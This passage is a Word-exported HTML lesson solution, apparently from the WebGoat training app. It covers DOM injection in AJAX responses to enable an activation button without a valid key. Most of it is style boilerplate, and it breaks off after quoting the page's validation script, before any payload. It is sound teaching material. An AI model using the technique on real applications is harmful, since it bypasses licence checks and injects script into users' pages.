+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform DOM Injection Attack. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>How to
+perform DOM injection attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Some applications
+specially the ones that uses AJAX manipulates and updates the DOM directly
+using JavaScript, DHTML and eval() method.<br>
+An attacker may take advantage of that by intercepting the reply and try to
+inject some javascript commands to exploit his attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->*
+Your victim is a system that takes an activation key to allow you to use it.<br>
+* Your goal should be to try to get to enable the activate button.<br>
+* Take some time to see the HTML source in order to understand how the key
+validation process works.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_49" o:spid="_x0000_i1030" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/DOMInjection_files/image002.jpg" v:shapes="Picture_x0020_49"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> AJAX Security - DOM Injection</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>AJAX requires
+XML communication between the browser and the web application. When you view
+the source of the HTML page, you will notice the usage of XMLHttpRequest:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
+validate() {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var keyField
+= document.getElementById('key');<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
+'/WebGoat/attack?Screen=80&amp;menu=1150&amp;from=ajax&amp;key=' +
+encodeURIComponent(keyField.value);<o:p></o:p></span></p>
+
